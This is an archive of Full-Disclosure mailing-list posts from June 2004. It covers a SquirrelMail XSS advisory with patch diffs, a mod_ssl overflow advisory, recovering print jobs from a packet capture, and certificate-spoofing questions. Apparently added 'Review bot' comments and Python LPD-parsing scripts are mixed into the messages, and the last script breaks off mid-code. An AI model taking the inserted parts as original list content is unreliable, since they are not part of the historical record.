>On Sunday, 2004-05-30 at 03:15:44 +0200, Roman Medina wrote:
>
>> I also noticed that latest Debian stable distro ships a very old
>> version of SquirrelMail, which is vulnerable to several old XSS bugs
>> (in addition to the new one).
>
>The latest Stable is itself quite old. Debian does not release very
>often. But security bugs are fixed when they become known. I have not
>found any bug report concerning XSS in the Debian bugs database. Please
>be so kind and file bugs if you are running Debian. If not, please mail
>the Debian Security Team as described in
> http://www.de.debian.org/security/faq#contact

The point here is that it is not easy or always possible to track every error being corrected in every piece of software. In other words, many vendors/developers silently fix bugs and they don't necessarily have to know who is packaging their software and inform them. Mix this with the (IMHO) too conservative Debian policy, beat well and you've got it :-)

I did not perform an exhaustive check. I simply chose some of the latest 2.x versions from the changelog where the string "XSS" was listed; I had the strong feeling that the bug would still be present in Debian stable. And I guessed right :) The result is listed in my advisory. Quoting from it:

"
I chose between two beautiful bugs:

roman at rs-labs:~$ diff -ur squirrelmail-1.2.10/src/read_body.php squirrelmail-1.2.11/src/read_body.php
@@ -976,7 +977,7 @@ "" . _("Mailer") . ': '. "" . - - "$mailer " . + "" . htmlentities($mailer) . " " . '' . "" . "\n"; roman at rs-labs:~$ diff -ur squirrelmail-1.2.10/functions/mailbox_display.php squirrelmail-1.2.11/functions/mailbox_display.php require_once('../functions/strings.php'); @@ -59,7 +59,7 @@ if ($senderName != '') { $senderName .= ', '; } - - $senderName .= sqimap_find_displayable_name($senderNames_part); + $senderName .= htmlentities(sqimap_find_displayable_name($senderNames_part)); } } "

I repeat that I didn't test other versions (and I don't have more time to spend on this). I've placed the Debian security team email on CC, but you should know that I informed Sam (Debian maintainer for SM) of all these issues. Indeed I've exchanged many mails with the SM team / Sam (both of them always being on CC / To). The final advisory was also sent to Sam before the release. I supposed he would release new .deb packages. I don't know what happened.

Saludos,
--Roman

-- 
PGP Fingerprint: 09BB EFCD 21ED 4E79 25FB 29E1 E47F 8A7D EAD5 6742
[Key ID: 0xEAD56742. Available at KeyServ]

From security at linux-mandrake.com Wed Jun 2 01:12:15 2004
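Review bot: in the read_body.php hunk, htmlentities($mailer) is called with no quote-style and no charset argument, so single quotes are left unencoded and the conversion runs with PHP's default charset (ISO-8859-1 on the PHP 4 releases the 1.2.x tree targeted); the fix therefore holds only while $mailer is emitted as element content or inside a double-quoted attribute, and a UTF-8 mailer string is turned into wrong entities. Suggest htmlspecialchars($mailer, ENT_QUOTES, $charset) with the message charset passed explicitly.

Review bot: in the mailbox_display.php hunk, the escaping is applied while $senderName is being accumulated, so from this point on the variable holds entity-encoded names mixed with the literal ', ' separator; any later length-based truncation of $senderName for the column width can split an entity such as &lt; and leave a dangling fragment like '&l' in the page. Escaping at the point where $senderName is echoed, rather than while building it, keeps the stored value raw and removes that failure mode; ENT_QUOTES is missing here as well.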
From: security at linux-mandrake.com (Mandrake Linux Security Team)
Date: 2 Jun 2004 00:12:15 -0000
Subject: [Full-Disclosure] MDKSA-2004:054 - Updated mod_ssl package fix remote vulnerability
Message-ID: <20040602001215.19511.qmail@updates.mandrakesoft.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandrakelinux Security Update Advisory
_______________________________________________________________________

Package name: mod_ssl
Advisory ID: MDKSA-2004:054
Date: June 1st, 2004
Affected versions: 10.0, 9.1, 9.2, Corporate Server 2.1, Multi Network Firewall 8.2
______________________________________________________________________

Problem Description:

A stack-based buffer overflow exists in the ssl_util_uuencode_binary function in ssl_engine_kernel.c in mod_ssl for Apache 1.3.x. When mod_ssl is configured to trust the issuing CA, a remote attacker may be able to execute arbitrary code via a client certificate with a long subject DN.

The provided packages are patched to prevent this problem.
_______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0488 ______________________________________________________________________ Updated Packages: Mandrakelinux 10.0: e835aa3c42443822b1bb38202a242864 10.0/RPMS/mod_ssl-2.8.16-1.1.100mdk.i586.rpm 92c3494519927447e841b87e41c18030 10.0/SRPMS/mod_ssl-2.8.16-1.1.100mdk.src.rpm Mandrakelinux 10.0/AMD64: 9443127cebae4776cba6a419faea6db9 amd64/10.0/RPMS/mod_ssl-2.8.16-1.1.100mdk.amd64.rpm 92c3494519927447e841b87e41c18030 amd64/10.0/SRPMS/mod_ssl-2.8.16-1.1.100mdk.src.rpm Corporate Server 2.1: 02f0643ee2c77e343e982d45272d2736 corporate/2.1/RPMS/mod_ssl-2.8.10-5.3.C21mdk.i586.rpm 9dcf45014753c32281f3ef9424bdb4d3 corporate/2.1/SRPMS/mod_ssl-2.8.10-5.3.C21mdk.src.rpm Corporate Server 2.1/x86_64: a9bb204c891b9f4e02d611ec5d26438b x86_64/corporate/2.1/RPMS/mod_ssl-2.8.10-5.3.C21mdk.x86_64.rpm 9dcf45014753c32281f3ef9424bdb4d3 x86_64/corporate/2.1/SRPMS/mod_ssl-2.8.10-5.3.C21mdk.src.rpm Mandrakelinux 9.1: 5cb8b20c7d25a23c41797fa9cc1515ff 9.1/RPMS/mod_ssl-2.8.12-8.1.91mdk.i586.rpm f8222566b9d5dfb1a920a73f16142d4a 9.1/SRPMS/mod_ssl-2.8.12-8.1.91mdk.src.rpm Mandrakelinux 9.1/PPC: 254ddacd51c9a8a82207c4a268c064f6 ppc/9.1/RPMS/mod_ssl-2.8.12-8.1.91mdk.ppc.rpm f8222566b9d5dfb1a920a73f16142d4a ppc/9.1/SRPMS/mod_ssl-2.8.12-8.1.91mdk.src.rpm Mandrakelinux 9.2: 806e5234ca391db643339020e719bc0f 9.2/RPMS/mod_ssl-2.8.15-1.1.92mdk.i586.rpm 1bb3fbc11273a15fb681c8f94925154d 9.2/SRPMS/mod_ssl-2.8.15-1.1.92mdk.src.rpm Mandrakelinux 9.2/AMD64: d46068aa64c2aa3c106428d6bcf5e480 amd64/9.2/RPMS/mod_ssl-2.8.15-1.1.92mdk.amd64.rpm 1bb3fbc11273a15fb681c8f94925154d amd64/9.2/SRPMS/mod_ssl-2.8.15-1.1.92mdk.src.rpm Multi Network Firewall 8.2: 9855760b94cdb77928ed1a480684bd7c mnf8.2/RPMS/mod_ssl-2.8.7-3.3.M82mdk.i586.rpm 4ad6b33008550170e737fdd9d69a72ed mnf8.2/SRPMS/mod_ssl-2.8.7-3.3.M82mdk.src.rpm _______________________________________________________________________ To 
upgrade automatically use MandrakeUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandrakesoft for security.

You can obtain the GPG public key of the Mandrakelinux Security Team by executing:

gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandrakelinux at:

http://www.mandrakesoft.com/security/advisories

If you want to report vulnerabilities, please contact

security_linux-mandrake.com

Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Linux Mandrake Security Team

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.7 (GNU/Linux)

iD8DBQFAvRtfmqjQ0CJFipgRArpPAKCe5Prh9xa8pbQzXLE6m+JwdxbgFwCg651p
YW0+Z6z/hwipDRdWmQ/ABG8=
=eoEM
-----END PGP SIGNATURE-----

From mdz at debian.org Wed Jun 2 00:59:42 2004
From: mdz at debian.org (Matt Zimmerman)
Date: Tue, 1 Jun 2004 16:59:42 -0700
Subject: [Full-Disclosure] Re: RS-2004-1: SquirrelMail "Content-Type" XSS vulnerability
In-Reply-To: <424qb0hejaasctgams01s0hd8s1roapkc7@4ax.com>
References: <20040601211332.GB1538@lupe-christoph.de> <424qb0hejaasctgams01s0hd8s1roapkc7@4ax.com>
Message-ID: <20040601235942.GS19402@alcor.net>

On Wed, Jun 02, 2004 at 01:49:01AM +0200, Roman Medina wrote:

> In other words, many vendors/developers silently fix bugs and they don't
> necessarily have to know who is packaging their software and inform them.

Such vendors/developers are doing their users and the community a disservice. Proper public disclosure of vulnerabilities requires very little effort on their part; there is no good reason to conceal information this way. There is no need to contact every downstream vendor directly; they monitor the usual channels.

-- 
 - mdz

From Ian.Latter at mq.edu.au Wed Jun 2 04:32:07 2004
From: Ian.Latter at mq.edu.au (Ian Latter)
Date: Wed, 02 Jun 2004 13:32:07 +1000
Subject: [Full-Disclosure] PCAP and LP
Message-ID: <200406020332.i523W9J14307@singularity.tronunltd.com>

Hello,

Quick question: I'm going through the results of an investigation and have a PCAP file that contains Line Printing ... I'd like to reconstruct the postscript files (or just reprint them). Is there a tool that will allow this?

Web searches yield HTTP file reconstructors and NFS file reconstructors, but I've been unable to find anything for LP.

The utility doesn't need to be open source or free/shareware, but it would be easiest if it was.

Thanks in advance,

-- 
Ian Latter
Internet and Networking Security Officer
Macquarie University

From ali at packetknife.com Wed Jun 2 04:12:19 2004
From: ali at packetknife.com (Ali-Reza Anghaie)
Date: Tue, 01 Jun 2004 23:12:19 -0400
Subject: [Full-Disclosure] PCAP and LP
In-Reply-To: <200406020332.i523W9J14307@singularity.tronunltd.com>
References: <200406020332.i523W9J14307@singularity.tronunltd.com>
Message-ID: <1086145939.3039.5.camel@damascus.packetknife.com>

On Tue, 2004-06-01 at 23:32, Ian Latter wrote:
> Quick question, I'm going through the results of an investigation
> and have a PCAP file that contains Line Printing ... I'd like to
> reconstruct the postscript files (or just reprint them), is there a
> tool that will allow this?

I'm not sure about reconstructing the PS file in a reasonable fashion (there is a good spec, it's a grokkable format, but it's not easily regexed in comparison to any other text)...

Perhaps using tcpreplay to push it to a printer would do?

-Ali

-- 
OpenPGP Key: 030E44E6
-- 
Was I helpful?: http://svcs.affero.net/rm.php?r=packetknife
-- 
I wouldn't get out of an electric chair to get in one of these things. -- Rusty Wallace (on IRL)

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 197 bytes
Desc: This is a digitally signed message part
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20040601/ce336589/attachment.bin

From Ian.Latter at mq.edu.au Wed Jun 2 07:04:30 2004
From: Ian.Latter at mq.edu.au (Ian Latter)
Date: Wed, 02 Jun 2004 16:04:30 +1000
Subject: [Full-Disclosure] PCAP and LP
Message-ID: <200406020604.i5264V314791@singularity.tronunltd.com>

Hello Ali,

According to the FAQ, this doesn't look entirely possible;

[...]
4.10 Replaying Client Traffic to a Server

A common question on the tcpreplay-users list is how does one replay the client side of a connection back to a server. Unfortunately, tcpreplay doesn't support this right now. The major problem concerns syncing up TCP Seq/Ack numbers which will be different. ICMP also often contains IP header information which would need to be adjusted. About the only thing that could be easy to do is UDP, which isn't usually requested.
[...]

From:
http://tcpreplay.sourceforge.net/FAQ.html

I've had one other suggestion, and that is contacting the author of "chaosreader" (with greenback or source);
http://users.tpg.com.au/bdgcvb/chaosreader.html

's'cool ... I'll fish the web a little more and see what comes out ... if nothing comes out, and I can't make a quick contribution to chaosreader, then I'll probably change the target host to acquire the asset via another protocol (http/smtp/etc).

Thanks all.

----- Original Message -----
>From: "Ali-Reza Anghaie"
>To: "Ian Latter"
>Subject: Re: [Full-Disclosure] PCAP and LP
>Date: Tue, 01 Jun 2004 23:12:19 -0400
>
> On Tue, 2004-06-01 at 23:32, Ian Latter wrote:
> > Quick question, I'm going through the results of an investigation
> > and have a PCAP file that contains Line Printing ... I'd like to
> > reconstruct the postscript files (or just reprint them), is there a
> > tool that will allow this?
>
> I'm not sure about reconstructing the PS file in a reasonable fashion
> (there is a good spec, it's a grokkable format, but it's not easily
> regexed in comparison to any other text)...
>
> Perhaps using tcpreplay to push it to a printer would do?
>
> -Ali
>
> --
> OpenPGP Key: 030E44E6
> --
> Was I helpful?: http://svcs.affero.net/rm.php?r=packetknife
> --
> I wouldn't get out of an electric chair to get in one of these
> things. -- Rusty Wallace (on IRL)
>

-- 
Ian Latter
Internet and Networking Security Officer
Macquarie University

From dowlingg at sullcrom.com Wed Jun 2 06:26:42 2004
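The question in the thread above (a PCAP holding LPD traffic, wanting the PostScript back) does not actually need a replay to a printer: the job's data file travels verbatim in the client-to-server byte stream of the TCP/515 connection, framed by the RFC 1179 "receive a printer job" subcommands, so it can be cut straight out of the capture. The script below is an added example; it is not a tool mentioned in the thread and not chaosreader. It assumes a classic libpcap file (not pcapng) with Ethernet/IPv4 framing and a plain LPD job (one \002 queue command followed by \002/\003 control- and data-file subcommands), and it ignores the server's one-byte acknowledgements, which travel in the other direction. The capture it runs on is constructed inside the block: the addresses and port are made up, checksums are left at zero, and the segments are delivered out of order with one duplicate so the reassembly path is exercised.

```python
import struct
from collections import defaultdict

LPD_PORT = 515  # RFC 1179 line printer daemon


def iter_pcap_frames(data):
    """Yield link-layer frames from a classic libpcap (.pcap, not pcapng) file held in memory."""
    magic = struct.unpack_from("<I", data, 0)[0]
    if magic == 0xA1B2C3D4:
        end = "<"
    elif magic == 0xD4C3B2A1:
        end = ">"
    else:
        raise ValueError("not a libpcap capture")
    off = 24                                    # 24-byte global header
    while off + 16 <= len(data):
        incl_len = struct.unpack_from(end + "IIII", data, off)[2]
        off += 16                               # 16-byte record header
        yield data[off:off + incl_len]
        off += incl_len


def tcp_segment(frame):
    """((src_ip, sport), (dst_ip, dport), seq, payload) for an Ethernet/IPv4/TCP frame, else None."""
    if len(frame) < 34 or frame[12:14] != b"\x08\x00":
        return None
    ip = frame[14:]
    ihl, proto, total = (ip[0] & 0x0F) * 4, ip[9], struct.unpack_from("!H", ip, 2)[0]
    if proto != 6:
        return None
    ip = ip[:total]                             # drop any Ethernet trailer padding
    tcp = ip[ihl:]
    sport, dport, seq = struct.unpack_from("!HHI", tcp, 0)
    payload = tcp[(tcp[12] >> 4) * 4:]          # data offset is the high nibble of byte 12
    src = ".".join(map(str, ip[12:16]))
    dst = ".".join(map(str, ip[16:20]))
    return (src, sport), (dst, dport), seq, payload


def client_streams_to_lpd(pcap_bytes):
    """Reassemble the client->server byte stream of every TCP connection to port 515.
    Segments are ordered by sequence number; duplicates and overlapping retransmits are dropped."""
    segs =defaultdict(dict)
    for frame in iter_pcap_frames(pcap_bytes):
        parsed = tcp_segment(frame)
        if parsed and parsed[1][1] == LPD_PORT and parsed[3]:
            segs[(parsed[0], parsed[1])].setdefault(parsed[2], parsed[3])   # first copy wins
    streams = {}
    for flow, by_seq in segs.items():
        buf, expected = bytearray(), 0
        for seq in sorted(by_seq):
            chunk = by_seq[seq]
            if seq < expected:                  # partial retransmit: keep only the new tail
                chunk = chunk[expected - seq:]
            buf += chunk
            expected = max(expected, seq + len(by_seq[seq]))
        streams[flow] = bytes(buf)
    return streams


def lpd_job_files(stream):
    """Parse an RFC 1179 'receive a printer job' exchange (client side only) into
    {file name: bytes}. Control files are cfA..., data files (the PostScript) dfA...."""
    files = {}
    if not stream or stream[0] != 0x02:         # \002<queue>\n opens the job
        return files
    pos = stream.index(b"\n") + 1
    while pos < len(stream) and stream[pos] in (0x02, 0x03):   # 2 = control file, 3 = data file
        nl = stream.index(b"\n", pos)
        count, name = stream[pos + 1:nl].split(b" ", 1)
        count, pos = int(count), nl + 1
        if count == 0:                          # length unknown: data runs to the end of the connection
            files[name.decode()] = stream[pos:]
            break
        files[name.decode()] = stream[pos:pos + count]
        pos += count + 1                        # skip the file and the NUL octet that terminates it
    return files


def recover_print_jobs(pcap_bytes):
    """{flow: {file name: bytes}} for every LPD job in the capture."""
    return {flow: lpd_job_files(s) for flow, s in client_streams_to_lpd(pcap_bytes).items()}


# --- constructed sample capture (made up for this example, not from the investigation) ---
SAMPLE_PS = b"%!PS-Adobe-3.0\n/Helvetica findfont 12 scalefont setfont\n72 720 moveto (recovered) show\nshowpage\n"
SAMPLE_CF = b"Hworkstation\nPalice\nfdfA042workstation\nUdfA042workstation\nNreport.ps\n"
SAMPLE_JOB = (b"\x02lp\n"
              + b"\x02%d cfA042workstation\n" % len(SAMPLE_CF) + SAMPLE_CF + b"\x00"
              + b"\x03%d dfA042workstation\n" % len(SAMPLE_PS) + SAMPLE_PS + b"\x00")


def _frame(src, dst, sport, dport, seq, payload):
    """Minimal Ethernet/IPv4/TCP frame for the sample; checksums are left zero."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, seq, 0, 5 << 4, 0x18, 65535, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 1, 0, 64, 6, 0,
                     bytes(map(int, src.split("."))), bytes(map(int, dst.split(".")))) + tcp
    return b"\x00" * 12 + b"\x08\x00" + ip


def build_sample_pcap():
    """The sample job split into three segments, delivered out of order with one duplicate."""
    pieces = [(1000, SAMPLE_JOB[:4]), (1040, SAMPLE_JOB[40:]), (1004, SAMPLE_JOB[4:40]), (1004, SAMPLE_JOB[4:40])]
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    for seq, payload in pieces:
        frame = _frame("10.0.0.5", "10.0.0.9", 40000, LPD_PORT, seq, payload)
        out += struct.pack("<IIII", 0, 0, len(frame), len(frame)) + frame
    return out


if __name__ == "__main__":
    for flow, files in recover_print_jobs(build_sample_pcap()).items():
        for name, body in files.items():
            print(flow, name, len(body), "bytes")
```

Write each recovered dfA* entry to a file and it is the original PostScript, ready for ghostscript or a real printer; the matching cfA* control file names the submitting host, user and original file name (the H, P and N lines), which is usually the evidential part. A capture that lost segments shows up as truncated data files, because the count prefix says how long each file should be; if the count is zero the client signalled end-of-file by closing the connection, and the script takes the rest of the stream.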
From: dowlingg at sullcrom.com (Dowling, Gabrielle)
Date: Wed, 2 Jun 2004 01:26:42 -0400
Subject: [Full-Disclosure] Cleaning viruses from netware
Message-ID:

The permissions are set in the nwadmin tool, and it's not unlike how you set permissions in NT/AD. It is also generally an easy task to figure out the source of the incursion from the infected files, if they haven't been moved into quarantine, by checking the properties on them.

Permissions have to be set for the functions required by the hosting process or content residing on the host server, which may have specific ACLs, or lack thereof, applied. Especially where dynamic data creation is involved, there's no good reason not to be running realtime AV on Netware servers. But if you bump into a problem, you can always run a sweep from a different system that is running AV by mapping a drive to the Netware system and choosing to run a scan on that drive. But it would be better to have realtime AV on the boxes.

And you have to treat latent infectious content with a grain of salt if you don't know the mitigating controls in place in your network, largely because of what Nimda did with riched20, and also because you don't know how people might be opening up shares on your network to general "browsing".

G

Best,
Gaby

-----Original Message-----
From: Gadi Evron
To: Dowling, Gabrielle
CC: full-disclosure at lists.netsys.com
Sent: Mon May 31 10:25:29 2004
Subject: Re: [Full-Disclosure] Cleaning viruses from netware

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

| I'm not aware of anything that can actually infect a netware system, just things that can drop latent infectious content when write rights are relatively open.

I am not much of a Netware guy; can you please explain what I need to check regarding permissions, and where? What should they be set to? What are you referring to?

I was referring to simply scanning every computer on the network; however, there were viruses found on file servers with Netware shares, if that is what they are called. Network drives?

Gadi.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.3 (MingW32)

iD8DBQFAu0BXqH6NtwbH1FARAq9FAJ9wC5mbuxKMimkVKQZMmIYEfGbGcQCbBcmH
07YT9Gt0q+SqywPZbDEPxKI=
=FwY2
-----END PGP SIGNATURE-----

**********************************************************************
This e-mail is sent by a law firm and contains information that may be privileged and confidential. If you are not the intended recipient, please delete the e-mail and notify us immediately.
***********************************************************************

-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20040602/03a633a3/attachment.html

From krahmer at suse.de Wed Jun 2 09:26:06 2004
From: krahmer at suse.de (Sebastian Krahmer)
Date: Wed, 2 Jun 2004 10:26:06 +0200 (CEST)
Subject: [Full-Disclosure] VerySign Class 1 Authority - bogus SSL certificate?
In-Reply-To:
References:
Message-ID:

On Wed, 2 Jun 2004, Chris van der Pennen wrote:

Hi,

Depending on your trusted-CA package for your SSL client, this should not verify. There are various ways to confuse SSL clients. Especially GUI based web-browsers allow playing tricks where you can't decide whether you are being prompted with a correct certificate. Some do not check the signature at all. If in doubt, if there is any popup on a HTTPS site, there's someone playing games.

I am going to release slides from a speech regarding that topic soon (in German, unfortunately).

Sebastian

> I've been getting SSL certificates from various websites recently that are
> apparently from a "VerySign Class 1 Authority" - note the 'y' in VerySign.
> The certificate expired 6 December 2002.
>
> The data in Issued To and Issued By are identical.
>
> This smells very much like an SSL hijack attempt - can anyone shed some
> light on the situation?
>
> Chris
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>

--
~
~ perl self.pl
~ $_='print"\$_=\47$_\47;eval"';eval
~
krahmer at suse.de - SuSE Security Team
~

From: aditya.deshmukh at online.gateway.technolabs.net (Aditya, ALD [Aditya Lalit Deshmukh])
Date: Wed, 2 Jun 2004 08:57:51 +0530
Subject: [Full-Disclosure] VerySign Class 1 Authority - bogus SSL certificate?
In-Reply-To:
Message-ID:

> I've been getting SSL certificates from various websites recently that are
> apparently from a "VerySign Class 1 Authority" - note the 'y' in VerySign.
> The certificate expired 6 December 2002.

this is a valid attempt

> The data in Issued To and Issued By are identical.

no big deal in this type of cert; these certs can be created by anyone, except that verisign cert would not have been accepted by the browser, that is why we have trusted Certificate authorities which do the validation of the certs.

> This smells very much like an SSL hijack attempt - can anyone shed some
> light on the situation?

if this is your site, please revoke the cert and make a new one, or if u know the site owner please alert the site owner as well as verisign

-aditya

From: noamr at beyondsecurity.com (Noam Rathaus)
Date: Wed, 2 Jun 2004 10:43:25 +0300
Subject: [Full-Disclosure] Firebird Database Remote Database Name Overflow
In-Reply-To: <3CF95025.7090202@secnetops.com>
References: <200406012040.14839.aviram@beyondsecurity.com> <3CF95025.7090202@secnetops.com>
Message-ID: <200406021043.25680.noamr@beyondsecurity.com>

On Sunday 02 June 2002 01:52, KF (lists) wrote:
> So is this firebird specific or does it also impact Borland Interbase
> users?
> -KF
>

We haven't tested Borland's Interbase as we didn't have any installation available for testing. However I can assume that since this vulnerability appears in version 1.0.2, which is of very close resemblance to Borland's Interbase sources, that the vulnerability may also affect it.

--
Thanks
Noam Rathaus
CTO
Beyond Security Ltd.

Join the SecuriTeam community on Orkut: http://www.orkut.com/Community.aspx?cmm=44441

From: lists2 at onryou.com (Cory Donnelly)
Date: Wed, 02 Jun 2004 08:24:30 -0400
Subject: [Full-Disclosure] RS-2004-1: SquirrelMail "Content-Type" XSS vulnerability
In-Reply-To: <20040601235942.GS19402@alcor.net>
References: <20040601211332.GB1538@lupe-christoph.de> <424qb0hejaasctgams01s0hd8s1roapkc7@4ax.com> <20040601235942.GS19402@alcor.net>
Message-ID: <40BDC6FE.6060907@onryou.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Matt Zimmerman wrote:
> Such vendors/developers are doing their users and the community a
> disservice. Proper public disclosure of vulnerabilities requires very
> little effort on their part; there is no good reason to conceal
> information this way. There is no need to contact every downstream
> vendor directly; they monitor the usual channels.

From the shortsighted developer's perspective there are *plenty* of very compelling reasons to discreetly fix vulnerabilities. A developer may be wary of losing his/her job should management learn of the gaffe. A developer's pride may prevent him/her from notifying the appropriate folks in his/her organization. A developer may not realize the seriousness of a vulnerability (or may fix it accidentally). Management may pressure the developer to keep the changelog positive, using the argument that all documentation associated with their software must go through the PR department.

Obviously the world would be a better place if these disclosures were made (and made consistently), but there are plenty of good reasons (depending on perspective) to keep quiet about bug fixes.

Regardless, we've strayed off-topic -- Roman's original point about how backporting security patches to debian-stable only works when debian-stable backporters are aware of vulnerabilities is absolutely correct.

take care,
Cory
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (MingW32)

iD8DBQFAvcb+okBdAgPGOhURAsr6AKC9Tii2d3A1YxE+YEH49UULnTjywQCfdYnF
9ZpToiNm++VzwFH8IvLNBDw=
=/P6/
-----END PGP SIGNATURE-----

From: erwinp21 at hotmail.com (- -)
Date: Wed, 02 Jun 2004 11:42:22 +0000
Subject: [Full-Disclosure] IBM Potential Credential Impersonation Attack paper?
Message-ID:

Hi List,

I found the following IBM advisory via their outside advisory service:
http://www-1.ibm.com/support/docview.wss?uid=swg21168762

They refer to an externally available paper that identifies a form of credential impersonation exploit that can affect multiple IBM products. Does anybody know which paper IBM is referring to? I tried google, but I couldn't find anything.

Regards,
Erwin.

From: brendan.gregg at tpg.com.au (Brendan Gregg)
Date: Thu, 3 Jun 2004 00:49:52 +1000 (EST)
Subject: [Full-Disclosure] PCAP and LP
In-Reply-To: <20040530080007.846.75274.Mailman@NETSYS.COM>
Message-ID:

G'Day Ian,

----- Original Message -----
> From: Ian Latter (Ian.Latter_at_mq.edu.au)
> Date: Jun 01 2004
>
> Hello Ali,
>
> According to the FAQ, this doesn't look entirely possible;
>
> [...]
> 4.10 Replaying Client Traffic to a Server
>
> A common question on the tcpreplay-users list is how
> [...]
>
> From; http://tcpreplay.sourceforge.net/FAQ.html
>
> I've had one other suggestion, and that is contacting the author
> of "chaosreader" (with greenback or source);
>
> http://users.tpg.com.au/bdgcvb/chaosreader.html
>
> 's'cool ... I'll fish the web a little more and see what comes out ... if
> nothing comes out, and I can't make a quick contribution to
> chaosreader, then I'll probably change the target host to acquire
> the asset via another protocol (http/smtp/etc).
>

Chaosreader can retrieve print jobs with a little help,

   # snoop -o /tmp/out1 port 515
   Using device /dev/hme (promiscuous mode)
   205 ^C
   #
   # ../chaosreader -v /tmp/out1
   Chaosreader ver 0.94
   Opening, /tmp/out1
   Reading file contents, 100% (251376/251376)
   Reassembling packets, 100% (205/205)
   Creating files...
      Num  Session (host:port <=> host:port)          Service
      0001  192.168.1.5:1021,192.168.1.1:515          printer
   index.html created.
   #
   # ls -l *.raw*
   -rw-r--r--   1 brendan     231678 Jun  3 00:21 session_0001.printer.raw
   -rw-r--r--   1 brendan          5 Jun  3 00:21 session_0001.printer.raw1
   -rw-r--r--   1 brendan     231673 Jun  3 00:21 session_0001.printer.raw2

Now if I "vi session_0001.printer.raw2" and remove the top 2 and bottom 9 lines, I have the original PostScript file (cksums ok). (Your capture may vary a little, but it should be obvious where the PostScript begins and ends).

Or if I didn't want to use vi,

   # perl -e 'push(@A,$_) while(<>); print @A[2..($#A-10)]' \
        session_0001.printer.raw2 > lp.ps

It would be nice if Chaosreader automatically did this - I guess I should add it for the next release. If anyone would like to make a quick contribution you are welcome to send me small sample capture files (snoop or tcpdump). :)

PS. the most stable link is,
http://www.brendangregg.com/chaosreader.html

no worries,

Brendan Gregg
[Sydney, Australia]

> ----- Original Message -----
> >From: "Ali-Reza Anghaie"
> >To: "Ian Latter"
> >Subject: Re: [Full-Disclosure] PCAP and LP
> >Date: Tue, 01 Jun 2004 23:12:19 -0400
> >
> > On Tue, 2004-06-01 at 23:32, Ian Latter wrote:
> > > Quick question, I'm going through the results of an investigation
> > > and have a PCAP file that contains Line Printing ... I'd like to
> > > reconstruct the postscript files (or just reprint them), is there a
> > > tool that will allow this?
[...]

From: tpohl at computerbild.de (tpohl at computerbild.de)
Date: Wed, 2 Jun 2004 18:14:42 +0200
Subject: [Full-Disclosure] Autoreply: Full-Disclosure digest, Vol 1 #1685 - 26 msgs
Message-ID:

I am out of the office until 07.06.2004. In urgent cases please call 040/347-28000. Your mail will not be forwarded!

Kind regards
Thomas Pohl

ASmediaSystems Operations
DCS Computerbild
Axel Springer AG
Axel-Springer-Platz 1
20350 Hamburg
Tel.: +49 40 347 26301
Fax: +49 40 347 16301
Thomas.Pohl at axelspringer.de

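The protocol-aware way to do what Brendan does above with vi and the perl one-liner, as an added example that is not part of chaosreader or of his message: the client side of an LPD session (RFC 1179) is a "receive job" command followed by "receive control file" / "receive data file" subcommands, each carrying a byte count, so the PostScript can be cut out exactly instead of trimming a fixed number of lines. The sample job below is constructed; the file names (dfA042workstation, cfA042workstation) and control-file fields are illustrative.

```python
"""Recover a print job from a reassembled LPD (RFC 1179) client stream.

Added example for the PCAP/LP thread; it is not chaosreader code.  It
assumes the input is the client->server byte stream of one connection to
port 515 (what chaosreader writes to the larger .raw file), and that the
job was sent with the 'receive job' command.  The sample stream is built
in this file, so nothing here depends on a capture.
"""

RECEIVE_JOB = 0x02      # \002queue\n                 first command on port 515
SUBCMD_ABORT = 0x01     # \001\n
SUBCMD_CONTROL = 0x02   # \002count cfA...\n + count bytes + \0
SUBCMD_DATA = 0x03      # \003count dfA...\n + count bytes + \0


def build_lpr_job(queue, cfname, control, dfname, data):
    """Build the client side of a receive-job exchange (used for the constructed sample)."""
    out = bytearray()
    out += bytes([RECEIVE_JOB]) + queue.encode("ascii") + b"\n"
    # Many clients send the data file first and the control file last, which is
    # why protocol lines sit both before and after the PostScript in a capture.
    out += bytes([SUBCMD_DATA]) + b"%d %s\n" % (len(data), dfname.encode("ascii"))
    out += data + b"\x00"
    out += bytes([SUBCMD_CONTROL]) + b"%d %s\n" % (len(control), cfname.encode("ascii"))
    out += control + b"\x00"
    return bytes(out)


def parse_control_file(control):
    """Map single-letter control-file operands (H host, P user, J job, ...) to their values."""
    fields = {}
    for line in control.decode("ascii", "replace").splitlines():
        if line:
            fields.setdefault(line[0], line[1:])
    return fields


def parse_lpr_job(stream):
    """Return {'queue', 'control', 'data'} parsed from a client->server LPD stream."""
    if not stream or stream[0] != RECEIVE_JOB:
        raise ValueError("stream does not start with a receive-job command")
    nl = stream.index(b"\n")
    job = {"queue": stream[1:nl].decode("ascii"), "control": None, "data": []}
    pos = nl + 1
    while pos < len(stream):
        code = stream[pos]
        if code == SUBCMD_ABORT:
            job["aborted"] = True
            break
        if code not in (SUBCMD_CONTROL, SUBCMD_DATA):
            raise ValueError("unexpected subcommand 0x%02x at offset %d" % (code, pos))
        nl = stream.index(b"\n", pos)
        count_bytes, name = stream[pos + 1:nl].split(b" ", 1)
        count = int(count_bytes)
        start = nl + 1
        if code == SUBCMD_DATA and count == 0:
            # RFC 1179 7.3: a zero count means "data until the connection closes".
            body, pos = stream[start:], len(stream)
        else:
            body = stream[start:start + count]
            if len(body) != count:
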